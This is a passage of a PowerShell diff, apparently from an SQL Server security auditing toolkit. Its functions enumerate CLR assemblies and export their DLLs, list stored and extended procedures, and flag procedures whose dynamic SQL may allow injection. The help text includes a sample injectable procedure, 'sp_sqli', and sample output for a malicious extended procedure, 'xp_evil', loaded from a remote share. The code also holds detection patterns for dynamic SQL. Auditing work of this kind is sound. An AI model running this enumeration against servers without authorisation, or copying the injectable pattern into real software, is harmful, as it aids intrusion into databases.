Exporting runcmd.dll.dll + + ComputerName Instance DatabaseName assembly_method assembly_id assembly_name file_id file_name clr_name + ------------ -------- ------------ --------------- ----------- ------------- ------- --------- -------- + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 testdb readfile 65537 filetools 1 filetools filetools, ve... + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 testdb writefile 65537 filetools 1 filetools filetools, ve... + MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 testdb runcmd 65558 runcmd 1 ostools ostools,... + + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLStoredProcedureCLR -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for filenames.')] + [string]$AssemblyName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Folder to export DLLs to.')] + [string]$ExportFolder, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Do not show database users associated with default databases.')] + [Switch]$NoDefaults, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Show native CLR as well.')] + [Switch]$ShowAll, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblAssemblyFiles = New-Object -TypeName System.Data.DataTable + $null = $TblAssemblyFiles.Columns.Add('ComputerName') + $null = $TblAssemblyFiles.Columns.Add('Instance') + $null = $TblAssemblyFiles.Columns.Add('DatabaseName') + $null = $TblAssemblyFiles.Columns.Add('schema_name') + $null = $TblAssemblyFiles.Columns.Add('file_id') + $null = $TblAssemblyFiles.Columns.Add('file_name') + $null = $TblAssemblyFiles.Columns.Add('clr_name') + $null = $TblAssemblyFiles.Columns.Add('assembly_id') + $null = $TblAssemblyFiles.Columns.Add('assembly_name') + $null = $TblAssemblyFiles.Columns.Add('assembly_class') + $null = $TblAssemblyFiles.Columns.Add('assembly_method') + $null = $TblAssemblyFiles.Columns.Add('sp_object_id') + $null = $TblAssemblyFiles.Columns.Add('sp_name') + $null = $TblAssemblyFiles.Columns.Add('sp_type') + $null = $TblAssemblyFiles.Columns.Add('permission_set_desc') + $null = $TblAssemblyFiles.Columns.Add('create_date') + $null = $TblAssemblyFiles.Columns.Add('modify_date') + $null = $TblAssemblyFiles.Columns.Add('content') + } + + Process + { + # Note: Tables queried by this function typically require sysadmin or DBO privileges. + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get list of databases + if($NoDefaults) + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults + } + else + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + } + + # Setup assembly name filter + if($AssemblyName){ + $AssemblyNameQuery = "WHERE af.name LIKE '%$AssemblyName%'" + }else{ + $AssemblyNameQuery = "" + } + + # Set counter + $Counter = 0 + + # Get the privs for each database + $TblDatabases | + ForEach-Object -Process { + # Set DatabaseName filter + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Searching for CLR stored procedures in $DbName" + } + + # Define Query + $Query = " USE $DbName; + SELECT SCHEMA_NAME(so.[schema_id]) AS [schema_name], + af.file_id, + af.name + '.dll' as [file_name], + asmbly.clr_name, + asmbly.assembly_id, + asmbly.name AS [assembly_name], + am.assembly_class, + am.assembly_method, + so.object_id as [sp_object_id], + so.name AS [sp_name], + so.[type] as [sp_type], + asmbly.permission_set_desc, + asmbly.create_date, + asmbly.modify_date, + af.content + FROM sys.assembly_modules am + INNER JOIN sys.assemblies asmbly + ON asmbly.assembly_id = am.assembly_id + INNER JOIN sys.assembly_files af + ON asmbly.assembly_id = af.assembly_id + INNER JOIN sys.objects so + ON so.[object_id] = am.[object_id] + $AssemblyNameQuery" + + $NativeStuff = " + UNION ALL + SELECT SCHEMA_NAME(at.[schema_id]) AS [SchemaName], + af.file_id, + af.name + '.dll' as [file_name], + asmbly.clr_name, + asmbly.assembly_id, + asmbly.name AS [AssemblyName], + at.assembly_class, + NULL AS [assembly_method], + NULL as [sp_object_id], + at.name AS [sp_name], + 'UDT' AS [type], + asmbly.permission_set_desc, + asmbly.create_date, + asmbly.modify_date, + af.content + FROM sys.assembly_types at + INNER JOIN sys.assemblies asmbly + ON asmbly.assembly_id = at.assembly_id + INNER JOIN sys.assembly_files af + ON asmbly.assembly_id = af.assembly_id + ORDER BY [assembly_name], [assembly_method], [sp_name]" + + # Check for showall + if($ShowAll){ + $Query = "$Query$NativeStuff" + } + + # Execute Query + $TblAssemblyFilesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Add each result to table + $TblAssemblyFilesTemp | + ForEach-Object -Process { + + # Add results to table + $null = $TblAssemblyFiles.Rows.Add( + [string]$ComputerName, + [string]$Instance, + [string]$DbName, + [string]$_.schema_name, + [string]$_.file_id, + [string]$_.file_name, + [string]$_.clr_name, + [string]$_.assembly_id, + [string]$_.assembly_name, + [string]$_.assembly_class, + [string]$_.assembly_method, + [string]$_.sp_object_id, + [string]$_.sp_name, + [string]$_.sp_type, + [string]$_.permission_set_desc, + [string]$_.create_date, + [string]$_.modify_date, + [string]$_.content) + + # Setup vars for verbose output + $CLRFilename = $_.file_name + $CLRMethod = $_.assembly_method + $CLRAssembly = $_.assembly_name + $CLRAssemblyClass = $_.assembly_class + $CLRSp = $_.sp_name + + # Status user + Write-Verbose "$instance : - File:$CLRFilename Assembly:$CLRAssembly Class:$CLRAssemblyClass Method:$CLRMethod Proc:$CLRSp" + + # Export dll + if($ExportFolder){ + + # Create export folder + $ExportOutputFolder = "$ExportFolder\CLRExports" + If ((test-path $ExportOutputFolder) -eq $False){ + Write-Verbose "$instance : Creating export folder: $ExportOutputFolder" + $null = New-Item -Path "$ExportOutputFolder" -type directory + } + + # Create instance subfolder if it doesnt exist + $InstanceClean = $Instance -replace('\\','_') + $ServerPath = "$ExportOutputFolder\$InstanceClean" + If ((test-path $Serverpath) -eq $False){ + Write-Verbose "$instance : Creating server folder: $ServerPath" + $null = New-Item -Path "$ServerPath" -type directory + } + + # Create database subfolder if it doesnt exist + $Databasepath = "$ServerPath\$DbName" + If ((test-path $Databasepath) -eq $False){ + Write-Verbose "$instance : Creating database folder: $Databasepath" + $null = New-Item $Databasepath -type directory + } + + # Create dll file if it doesnt exist + $FullExportPath = "$Databasepath\$CLRFilename" + if(-not (Test-Path $FullExportPath)){ + Write-Verbose "$Instance : Exporting $CLRFilename" + $_.content | Set-Content -Encoding Byte $FullExportPath + }else{ + Write-Verbose "$Instance : Exporting $CLRFilename - Aborted, file exists." + } + + # Update counter + $Counter = $Counter + 1 + } + } + } + } + + End + { + # Check count + $CLRCount = $TblAssemblyFiles.Rows.Count + if ($CLRCount -gt 0){ + Write-Verbose "$Instance : - Found $CLRCount CLR stored procedures" + }else{ + Write-Verbose "$Instance : - No CLR stored procedures found." + } + + # Return data + $TblAssemblyFiles + } +} + + +# ---------------------------------- +# Get-SQLStoredProcedure +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLStoredProcedure +{ + <# + .SYNOPSIS + Returns stored procedures from target SQL Servers. + Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER ProcedureName + Procedure name to filter for. + .PARAMETER Keyword + Filter for procedures that include the keyword. + .PARAMETER AutoExec + Only select procedures that execute when the SQL Server service starts. + .PARAMETER NoDefaults + Filter out results from default databases. + .EXAMPLE + PS C:\> Get-SQLStoredProcedure -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + SchemaName : dbo + ProcedureName : MyTestProc + ProcedureType : PROCEDURE + ProcedureDefinition : CREATE PROC MyTestProc + WITH EXECUTE AS OWNER + as + begin + select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin + end + SQL_DATA_ACCESS : MODIFIES + ROUTINE_BODY : SQL + CREATED : 7/24/2016 3:16:29 PM + LAST_ALTERED : 7/24/2016 3:16:29 PM + is_ms_shipped : False + is_auto_executed : False + + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedure -Verbose -NoDefaults + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Procedure name.')] + [string]$ProcedureName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for procedures that include the keyword.')] + [string]$Keyword, + + [Parameter(Mandatory = $false, + HelpMessage = "Only include procedures configured to execute when SQL Server service starts.")] + [switch]$AutoExec, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblProcs = New-Object -TypeName System.Data.DataTable + + # Setup routine name filter + if ($ProcedureName) + { + $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" + } + else + { + $ProcedureNameFilter = '' + } + + # Setup ROUTINE_DEFINITION filter + if ($Keyword) + { + $KeywordFilter = " AND ROUTINE_DEFINITION like '%$Keyword%'" + } + else + { + $KeywordFilter = '' + } + + # Setup AutoExec filter + if ($AutoExec) + { + $AutoExecFilter = " AND is_auto_executed = 1" + } + else + { + $AutoExecFilter = '' + } + } + + Process + { + # Parse ComputerName + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + $Instance = $Instance + } + else + { + $ComputerName = $env:COMPUTERNAME + $Instance = '.\' + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Grabbing stored procedures from databases below:" + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } + + # Get role for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - $DbName" + } + + # Define Query + $Query = " use [$DbName]; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + ROUTINE_CATALOG AS [DatabaseName], + ROUTINE_SCHEMA AS [SchemaName], + ROUTINE_NAME as [ProcedureName], + ROUTINE_TYPE as [ProcedureType], + ROUTINE_DEFINITION as [ProcedureDefinition], + SQL_DATA_ACCESS, + ROUTINE_BODY, + CREATED, + LAST_ALTERED, + b.is_ms_shipped, + b.is_auto_executed + FROM [INFORMATION_SCHEMA].[ROUTINES] a + JOIN [sys].[procedures] b + ON a.ROUTINE_NAME = b.name + WHERE 1=1 + $AutoExecFilter + $ProcedureNameFilter + $KeywordFilter" + + # Execute Query + $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblProcs = $TblProcs + $TblProcsTemp + } + } + + End + { + # Return data + $TblProcs + } +} + + +# ---------------------------------- +# Get-SQLStoredProcedureXP +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLStoredProcedureXP +{ + <# + .SYNOPSIS + Returns custom extended stored procedures from target SQL Server databases. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER ProcedureName + Procedure name to filter for. + .PARAMETER NoDefaults + Filter out results from default databases. + .EXAMPLE + PS C:\> Get-SQLStoredProcedureXP -Instance SQLServer1\STANDARDDEV2014 -DatabaseName master + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : master + object_id : 1559676604 + parent_object_id : 0 + schema_id : 1 + type : X + type_desc : EXTENDED_STORED_PROCEDURE + name : xp_evil + principal_id : + text : \\acme.com@SSL\evilxp.txt + ctext : {92, 0, 92, 0...} + status : 0 + create_date : 9/11/2017 11:36:06 AM + modify_date : 9/11/2017 11:36:06 AM + is_ms_shipped : False + is_published : False + is_schema_published : False + colid : 1 + compressed : False + encrypted : False + id : 1559676604 + language : 0 + number : 0 + texttype : 2 + + + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedureXP -Verbose + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Procedure name.')] + [string]$ProcedureName, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblXpProcs = New-Object -TypeName System.Data.DataTable + + # Setup routine name filter + if ($ProcedureName) + { + $ProcedureNameFilter = " AND NAME like '$ProcedureName'" + } + else + { + $ProcedureNameFilter = '' + } + } + + Process + { + # Parse ComputerName + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + $Instance = $Instance + } + else + { + $ComputerName = $env:COMPUTERNAME + $Instance = '.\' + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Grabbing stored procedures from databases below:" + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } + + # Get role for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - $DbName" + } + + # Define Query + $Query = " use [$DbName]; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$DbName' as [DatabaseName], + o.object_id, + o.parent_object_id, + o.schema_id, + sc.name AS schema_name, + o.type, + o.type_desc, + o.name, + o.principal_id, + s.text, + CAST(s.ctext AS NVARCHAR(MAX)) AS ctext, + s.status, + o.create_date, + o.modify_date, + o.is_ms_shipped, + o.is_published, + o.is_schema_published, + s.colid, + s.compressed, + s.encrypted, + s.id, + s.language, + s.number, + s.texttype + FROM sys.objects o + INNER JOIN sys.syscomments s ON o.object_id = s.id + INNER JOIN sys.schemas sc ON o.schema_id = sc.schema_id + WHERE o.type = 'x' + $ProcedureNameFilter" + + # Execute Query + $TblXpProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblXpProcs = $TblXpProcs + $TblXpProcsTemp + } + } + + End + { + + # Count + $XpNum = $TblXpProcs.Count + if($XpNum -eq 0){ + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : No custom extended stored procedures found." + } + } + + # Return data + $TblXpProcs + } +} + + +# ---------------------------------- +# Get-SQLStoredProcedureSQLi +# ---------------------------------- +# Author: Scott Sutherland +# Todo: Add column Procedure_Owner_Name +# Todo: Add column owner Owner_Is_Sysadmin +# Todo: Add is_ms_shipped and is_auto_executed to signed proc query +Function Get-SQLStoredProcedureSQLi +{ + <# + .SYNOPSIS + Returns stored procedures containing dynamic SQL and concatenations that may suffer from SQL injection on target SQL Servers. + Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER ProcedureName + Procedure name to filter for. + .PARAMETER Keyword + Filter for procedures that include the keyword. + .PARAMETER OnlySigned + Filter for signed procedures. + .PARAMETER AutoExec + Only select procedures that execute when the SQL Server service starts. + .PARAMETER NoDefaults + Filter out results from default databases. + .EXAMPLE + PS C:\> Get-SQLStoredProcedureSqli -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + SchemaName : dbo + ProcedureName : sp_sqli + ProcedureType : PROCEDURE + ProcedureDefinition : -- Create procedure + CREATE PROCEDURE sp_sqli + @DbName varchar(max) + WITH EXECUTE AS OWNER + AS + BEGIN + Declare @query as varchar(max) + SET @query = 'SELECT name FROM master..sysdatabases where name like ''%'+ @DbName+'%'' OR name=''tempdb'''; + EXECUTE(@query) + END + GO + SQL_DATA_ACCESS : MODIFIES + ROUTINE_BODY : SQL + CREATED : 7/24/2016 3:16:29 PM + LAST_ALTERED : 7/24/2016 3:16:29 PM + is_ms_shipped : False + is_auto_executed : False + + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedureSqli -Verbose -NoDefaults + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Procedure name.')] + [string]$ProcedureName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for procedures that include the keyword.')] + [string]$Keyword, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for signed procedures.')] + [switch]$OnlySigned, + + [Parameter(Mandatory = $false, + HelpMessage = "Only include procedures configured to execute when SQL Server service starts.")] + [switch]$AutoExec, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblProcs = New-Object -TypeName System.Data.DataTable + + # Setup routine name filter + if ($ProcedureName) + { + $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" + } + else + { + $ProcedureNameFilter = '' + } + + # Setup ROUTINE_DEFINITION filter + if ($Keyword) + { + $KeywordFilter = " AND ROUTINE_DEFINITION like '%$Keyword%'" + } + else + { + $KeywordFilter = '' + } + + # Setup AutoExec filter + if ($AutoExec) + { + $AutoExecFilter = " AND is_auto_executed = 1" + } + else + { + $AutoExecFilter = '' + } + } + + Process + { + # Parse ComputerName + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + $Instance = $Instance + } + else + { + $ComputerName = $env:COMPUTERNAME + $Instance = '.\' + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Checking databases below for vulnerable stored procedures:" + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } + + # Get role for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + + Write-Verbose -Message "$Instance : - Checking $DbName database..." + + } + + # Define Query + $Query = " use [$DbName]; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + ROUTINE_CATALOG AS [DatabaseName], + ROUTINE_SCHEMA AS [SchemaName], + ROUTINE_NAME as [ProcedureName], + ROUTINE_TYPE as [ProcedureType], + ROUTINE_DEFINITION as [ProcedureDefinition], + SQL_DATA_ACCESS, + ROUTINE_BODY, + CREATED, + LAST_ALTERED, + b.is_ms_shipped, + b.is_auto_executed + FROM [INFORMATION_SCHEMA].[ROUTINES] a + JOIN [sys].[procedures] b + ON a.ROUTINE_NAME = b.name + WHERE 1=1 AND + (ROUTINE_DEFINITION like '%sp_executesql%' OR + ROUTINE_DEFINITION like '%sp_sqlexec%' OR + ROUTINE_DEFINITION like '%exec @%' OR + ROUTINE_DEFINITION like '%execute @%' OR + ROUTINE_DEFINITION like '%exec (%' OR + ROUTINE_DEFINITION like '%exec(%' OR + ROUTINE_DEFINITION like '%execute (%' OR + ROUTINE_DEFINITION like '%execute(%' OR + ROUTINE_DEFINITION like '%''''''+%' OR + ROUTINE_DEFINITION like '%'''''' +%') + AND ROUTINE_DEFINITION like '%+%' + AND ROUTINE_CATALOG not like 'msdb' + $AutoExecFilter + $ProcedureNameFilter + $KeywordFilter + ORDER BY ROUTINE_NAME" + + # Define query for signed procedures + if($OnlySigned){ + $Query = " use [$DbName]; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + spr.ROUTINE_CATALOG as DB_NAME, + spr.SPECIFIC_SCHEMA as SCHEMA_NAME, + spr.ROUTINE_NAME as SP_NAME, + spr.ROUTINE_DEFINITION as SP_CODE, + CASE cp.crypt_type + when 'SPVC' then cer.name + when 'CPVC' then Cer.name + when 'SPVA' then ak.name + when 'CPVA' then ak.name + END as CERT_NAME, + sp.name as CERT_LOGIN, + sp.sid as CERT_SID + FROM sys.crypt_properties cp + JOIN sys.objects o ON cp.major_id = o.object_id + LEFT JOIN sys.certificates cer ON cp.thumbprint = cer.thumbprint + LEFT JOIN sys.asymmetric_keys ak ON cp.thumbprint = ak.thumbprint + LEFT JOIN INFORMATION_SCHEMA.ROUTINES spr on spr.ROUTINE_NAME = o.name + LEFT JOIN sys.server_principals sp on sp.sid = cer.sid + WHERE o.type_desc = 'SQL_STORED_PROCEDURE'AND + (ROUTINE_DEFINITION like '%sp_executesql%' OR + ROUTINE_DEFINITION like '%sp_sqlexec%' OR + ROUTINE_DEFINITION like '%exec @%' OR + ROUTINE_DEFINITION like '%exec (%' OR + ROUTINE_DEFINITION like '%exec(%' OR + ROUTINE_DEFINITION like '%execute @%' OR + ROUTINE_DEFINITION like '%execute (%' OR + ROUTINE_DEFINITION like '%execute(%' OR + ROUTINE_DEFINITION like '%''''''+%' OR + ROUTINE_DEFINITION like '%'''''' +%') AND + ROUTINE_CATALOG not like 'msdb' AND + ROUTINE_DEFINITION like '%+%'" + } + + # Execute Query + $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Count results + $TblProcsCount = $TblProcsTemp.rows.count + Write-Verbose "$Instance : - $TblProcsCount found in $DbName database" + + # Append results + $TblProcs = $TblProcs + $TblProcsTemp + } + } + + End + { + # Return data + $TblProcs + } +} + +# ---------------------------------- +# Get-SQLStoredProcedureAutoExec +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLStoredProcedureAutoExec +{ + <# + .SYNOPSIS + Returns stored procedures from target SQL Servers. + Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER ProcedureName + Procedure name to filter for. + .PARAMETER Keyword + Filter for procedures that include the keyword. + .EXAMPLE + PS C:\> Get-SQLStoredProcedureAutoExec -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb + + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + SchemaName : dbo + ProcedureName : MyTestProc + ProcedureType : PROCEDURE + ProcedureDefinition : CREATE PROC MyTestProc + WITH EXECUTE AS OWNER + as + begin + select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin + end + SQL_DATA_ACCESS : MODIFIES + ROUTINE_BODY : SQL + CREATED : 7/24/2016 3:16:29 PM + LAST_ALTERED : 7/24/2016 3:16:29 PM + is_ms_shipped : False + is_auto_executed : TRUE + + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcedureAutoExec -Verbose -NoDefaults + #> + + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = 